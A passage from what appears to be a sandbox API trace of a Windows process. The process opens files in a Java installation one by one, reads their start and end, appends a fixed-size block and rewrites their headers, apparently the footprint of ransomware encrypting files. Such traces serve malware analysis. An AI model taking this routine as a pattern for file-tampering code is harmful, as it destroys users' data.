lpWideCharStr="tnameserv.exe", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tnameserv.exe", lpUsedDefaultChar=0x0) returned 13 [0131.582] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0131.915] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2fa8 [0131.915] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0131.932] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2fa8 [0131.932] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0131.933] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0131.933] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0131.933] CloseHandle (hObject=0x1dc) returned 1 [0131.934] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.935] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.935] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc824 [0131.935] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.936] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.936] ReleaseMutex (hMutex=0x168) returned 1 [0131.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIEXYZ.pf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CIEXYZ.pf", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CIEXYZ.pf", lpUsedDefaultChar=0x0) returned 9 [0131.936] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0131.962] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb824 [0131.962] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0131.967] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb824 [0131.968] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0131.968] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0131.968] WriteFile (in: hFile=0x1dc, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0131.969] CloseHandle (hObject=0x1dc) returned 1 [0131.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.970] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.970] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6b8 [0131.970] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.970] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.970] ReleaseMutex (hMutex=0x168) returned 1 [0131.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jqsmessages.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jqsmessages.properties", cchWideChar=22, lpMultiByteStr=0x1f8867c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jqsmessages.properties", lpUsedDefaultChar=0x0) returned 22 [0131.971] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x6b8, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x2d5f2bc*=0x6b8, lpOverlapped=0x0) returned 1 [0131.979] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0131.979] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xc40, lpOverlapped=0x0) returned 1 [0131.979] CloseHandle (hObject=0x1dc) returned 1 [0131.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.980] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.980] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd14 [0131.980] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.980] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.980] ReleaseMutex (hMutex=0x168) returned 1 [0131.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_pt_BR.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_pt_BR.properties", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_pt_BR.properties", lpUsedDefaultChar=0x0) returned 25 [0131.980] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xd14, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xd14, lpOverlapped=0x0) returned 1 [0131.987] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0131.987] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x129c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f2d0*=0x129c, lpOverlapped=0x0) returned 1 [0131.987] CloseHandle (hObject=0x1dc) returned 1 [0131.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0131.988] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.989] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x22e6 [0131.989] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0131.989] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.989] ReleaseMutex (hMutex=0x168) returned 1 [0131.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dnsns.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dnsns.jar", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dnsns.jar", lpUsedDefaultChar=0x0) returned 9 [0131.989] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0131.995] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12e6 [0131.995] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0132.272] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12e6 [0132.272] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0132.281] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0132.281] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0132.282] CloseHandle (hObject=0x1dc) returned 1 [0132.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0132.284] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.285] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x10c9a [0132.285] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.285] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.285] ReleaseMutex (hMutex=0x168) returned 1 [0132.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zipfs.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0132.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zipfs.jar", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zipfs.jar", lpUsedDefaultChar=0x0) returned 9 [0132.285] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0132.336] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xfc9a [0132.336] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0132.353] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xfc9a [0132.353] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0132.354] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0132.354] WriteFile (in: hFile=0x1dc, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0132.355] CloseHandle (hObject=0x1dc) returned 1 [0132.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0132.356] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.356] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4d9c8 [0132.356] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.356] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.356] ReleaseMutex (hMutex=0x168) returned 1 [0132.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansDemiBold.ttf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0132.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansDemiBold.ttf", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaSansDemiBold.ttf", lpUsedDefaultChar=0x0) returned 22 [0132.356] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0132.386] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4c9c8 [0132.386] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0132.401] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4c9c8 [0132.402] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0132.402] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0132.402] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0132.402] CloseHandle (hObject=0x1dc) returned 1 [0132.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.489] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.489] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x99 [0132.489] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.489] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.489] ReleaseMutex (hMutex=0x168) returned 1 [0132.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0132.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_CopyNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0132.489] ReadFile (in: hFile=0x204, lpBuffer=0x1e98ef8, nNumberOfBytesToRead=0x99, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e98ef8*, lpNumberOfBytesRead=0x2d5f2bc*=0x99, lpOverlapped=0x0) returned 1 [0132.491] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0132.491] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x621, lpOverlapped=0x0) returned 1 [0132.491] CloseHandle (hObject=0x204) returned 1 [0132.491] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\default.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\default.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.493] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.493] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x488e [0132.493] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.493] ReleaseMutex (hMutex=0x168) returned 1 [0132.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="default.jfc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0132.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="default.jfc", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="default.jfc", lpUsedDefaultChar=0x0) returned 11 [0132.493] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0132.500] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x388e [0132.500] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0132.507] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x388e [0132.508] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0132.508] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0132.508] WriteFile (in: hFile=0x204, 